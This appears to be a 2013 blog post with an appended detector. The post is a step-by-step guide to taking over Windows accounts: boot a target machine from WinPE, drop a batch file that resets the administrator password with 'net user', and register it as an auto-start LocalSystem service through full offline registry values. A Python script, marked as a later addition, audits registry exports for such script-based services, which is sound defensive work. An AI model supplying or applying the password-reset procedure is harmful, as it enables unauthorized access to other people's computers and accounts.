Saturday, 29 June 2013


Step 1: Prepare a WinPE Image (download it), and burn it to a USB flash drive or a CD/DVD disc.
Step 2: Boot the computer you want to hack from the WinPE live disk.
Step 3: Write a Windows password hack script:

   3.1 Create a file named windows-password-hack.bat.
   3.2 Write the password hack script: net user administrator 000. That is all; easy, isn't it? This command sets the administrator account's password to 000. To change other users' passwords, add more commands, one per line, like this: net user user_name1 new_password1 and net user user_name2 new_password2.
Step 4: Copy the hack script file to the Windows system32 directory.
Save windows-password-hack.bat and copy it to the system32 directory. Here, copy it to C:\Windows\System32. Note: If the system you want to hack is on the D: partition, you should copy windows-password-hack.bat to D:\Windows\System32.
Step 5: Edit the registry to make Windows run the hack script when it starts up (shown below).

       5.1 Load the SYSTEM hive into WinPE's registry, and give it the name system_hack.
       5.2 Add a subkey named windows-password-hack to HKEY_LOCAL_MACHINE\system_hack\services, and add a group of key values for it, as shown below:
[HKEY_LOCAL_MACHINE\system_hack\ControlSet001\Services\windows-password-hack]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"="windows-password-hack.bat"
"DisplayName"="windows-password-hack"
"ObjectName"="LocalSystem"
[HKEY_LOCAL_MACHINE\system_hack\ControlSet001\Services\windows-password-hack\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\
  05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\
  00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\
  00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\system_hack\ControlSet001\Services\windows-password-hack\Enum]
"Count"=dword:00000001
"NextInstance"=dword:00000001
       5.3 Unload system_hack from WinPE's registry.
Search Google for "How to edit Windows registry offline" for more detail.
Step 6: Restart the computer and log in to the Administrator account with the new password.
After logging in to Windows, you can open the registry and delete the windows-password-hack key.
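Seen from the defender's side, the service key from step 5 is the artifact this procedure leaves behind: an auto-start LocalSystem service whose ImagePath is a bare .bat file. The following audit script is an added example, not part of the original post; the sample export, the ExampleAgent service and the function names are constructed for illustration.

```python
import re

# Constructed sample in .reg export format (not real host data).
SAMPLE_EXPORT = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ExampleAgent]
"Type"=dword:00000010
"Start"=dword:00000002
"ImagePath"="C:\\Program Files\\Example\\agent.exe"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\windows-password-hack]
"Type"=dword:00000110
"Start"=dword:00000002
"ImagePath"="windows-password-hack.bat"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\windows-password-hack\Enum]
"Count"=dword:00000001
'''

# Matches a service's own key only; subkeys such as \Enum or \Security are skipped.
KEY_RE = re.compile(r"^\[(.+\\Services\\([^\\\]]+))\]$", re.IGNORECASE)
# Reads string and dword values only; hex-encoded value types are ignored.
VAL_RE = re.compile(r'^"([^"]+)"=(?:"(.*)"|dword:([0-9a-fA-F]{8}))$')
SCRIPT_RE = re.compile(r'\.(bat|cmd|vbs|js|ps1)(?=$|[\s"])', re.IGNORECASE)

def parse_services(text):
    """Return {service_name: {value_name_lowercase: value}} from .reg text."""
    services, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = services.setdefault(m.group(2), {}) if m else None
        elif current is not None and (v := VAL_RE.match(line)):
            name, s, d = v.groups()
            current[name.lower()] = int(d, 16) if d else s.replace("\\\\", "\\")
    return services

def audit(services):
    """Flag services whose ImagePath is a script or has no directory part."""
    findings = {}
    for name, v in services.items():
        image, reasons = str(v.get("imagepath", "")), []
        if SCRIPT_RE.search(image):
            reasons.append("ImagePath is a script, not an executable")
        if image and "\\" not in image:
            reasons.append("ImagePath has no directory component")
        if reasons and v.get("start") == 2 and str(v.get("objectname", "")).lower() == "localsystem":
            reasons.append("auto-start as LocalSystem")
        if reasons:
            findings[name] = reasons
    return findings
```

To run it against a real system, export the Services key with reg export and decode the resulting file as UTF-16 before passing its text to parse_services.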